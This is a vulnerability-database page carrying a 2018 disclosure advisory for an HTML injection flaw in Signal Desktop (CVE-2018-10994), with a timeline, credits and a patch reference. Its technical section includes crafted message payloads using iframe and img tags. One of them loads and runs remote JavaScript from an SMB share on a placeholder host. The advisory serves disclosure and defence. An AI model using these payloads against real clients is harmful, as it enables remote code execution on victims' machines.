Vulners
Lucene search
Signal Desktop HTML Injection
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2018-10994 | 17 Jan 202101:25 | – | circl |
 | Open Whisper Signal Cross-Site Scripting Vulnerability | 16 May 201800:00 | – | cnvd |
 | CVE-2018-10994 | 14 May 201823:00 | – | cve |
 | CVE-2018-10994 | 14 May 201823:00 | – | cvelist |
 | EUVD-2018-3045 | 7 Oct 202500:30 | – | euvd |
 | CVE-2018-10994 | 14 May 201823:29 | – | nvd |
 | Signal Desktop HTML Tag Injection Variant 2 | 16 May 201800:00 | – | packetstorm |
 | Open redirect | 14 May 201823:29 | – | prion |
| Design/Logic Flaw | 17 May 201819:29 | – | prion |
 | Another severe flaw in Signal desktop app lets hackers steal your chats in plaintext | 16 May 201814:14 | – | thn |
10
`Title: HTML tag injection in Signal-desktop
Date Published: 14-05-2018
CVE Name: CVE-2018-10994
Class: Code injection
Remotely Exploitable: Yes
Locally Exploitable: No
Vendors contacted: Signal.org
Vulnerability Description:
Signal-desktop is the standalone desktop version of the secure Signal
messenger.
This software is vulnerable to remote code execution from a malicious
contact,
by sending a specially crafted message containing HTML code that is
injected
into the chat windows (Cross-site scripting).
Vulnerable Packages:
Signal-desktop messenger v1.7.1
Signal-desktop messenger v1.8.0
Signal-desktop messenger v1.9.0
Signal-desktop messenger v1.10.0
Solution/Vendor Information/Workaround
Upgrade to Signal-desktop messenger v1.10.1, v1.11.0-beta.3.
Credits:
This vulnerability was found and researched by:
IvA!n Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and
Juliano Rizzo (@julianor), with assistance from
Javier Lorenzo Carlos Smaldone (@mis2centavos).
Technical Description - Exploit/Concept Code
12345678901234567890123456789012345678901234567890123456789012345678901234567890
While discussing a XSS vulnerability on a website using the Signal-desktop
messenger, it was found that the messenger software also displayed a
code-injection vulnerability while parsing the affected URLs.
The Signal-desktop software fails to sanitize specific html-encoded HTML
tags
that can be used to inject HTML code into remote chat windows.
Specifically the <img> and <iframe> tags can be used to include remote
or local
resources. For example, the use of iframes enables full code execution,
allowing
an attacker to download/upload files, information, etc. The <script>
tag was
also found injectable.
In the Windows operative system, the CSP fails to prevent remote
inclusion of
resources via the SMB protocol. In this case, remote execution of
JavaScript can
be achieved by referencing the script in a SMB share as the source of an
iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html>.
The included javascript code is then executed automatically, without any
interaction needed from the user. The vulnerability can be triggered in the
Signal-Desktop client by sending a specially crafted message. Example
messages:
Show an iframe with some text:
http://hacktheplanet/?p=%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E
Show a base64-encoded image (bypass "click to download image"):
http://hacktheplanet/?p=%3Cimg%20src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/wAALCAAtADwBAREA/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/9oACAEBAAA/AMapRbv5YckKD0z1pPJbjJAzSGIgjcQMnFEkZSTZkE+1STWksTKrAZbpThYzfLuAUN3JFJ9kkyeV4PrTBFyNzCpSGuZiRgY4ArRgtAvzSfMfSqN3EYpjsA2noTg1B87HlqNrnqxP40nlt6ml8pvWo/MY/wARqzAzcEVorK24RuAAw4IqLUo2EKFFJIOM9azN8oOMkfhTz9oVdxDhfWlR3ZOWJ/Gpdzep/OqVTQEq2MVpo4aNWABKHnNLIzNHGW7OST6DFZ92wEoAGAvX3qNrl/KaEH5CePaliPyYqVTwKrIu41O1u0Z4BP06irUDKiky5DYx04p8sxddpwFA6etZcrFnJPepLa2NwSFPIoQbQVPUHFTLjFUskd6d5j/3m/Ok3sf4j+dG9j/EfzpKVXZPusR9DSZPrS7j6mv/2Q=="%3e
Include and auto-execute a remote JavaScript file (for Windows
clients):
http://hacktheplanet/?p=%3d%3Ciframe%20src=\\XXX.XXX.XXX.XXX\Temp\test.html%3E
Timeline:
* 2018-05-10 18:45 GMT-3: vuln discovered
* 2018-05-11 13:03 GMT-3: emailed Signal security team
* 2018-05-11 15:02 GMT-3: reply from Signal: vuln confirmed & patch
ongoing
* 2018-05-11 16:12 GMT-3: patch committed
* 2018-05-11 18:00 GMT-3: signal-desktop update published
* 2018-05-14 18:00 GMT-3: public disclosure
References:
* Patch:
https://github.com/signalapp/Signal-Desktop/compare/v1.11.0-beta.2...v1.11.0-beta.3
* Writeup:
https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 May 2018 00:00Current
EPSS0.00323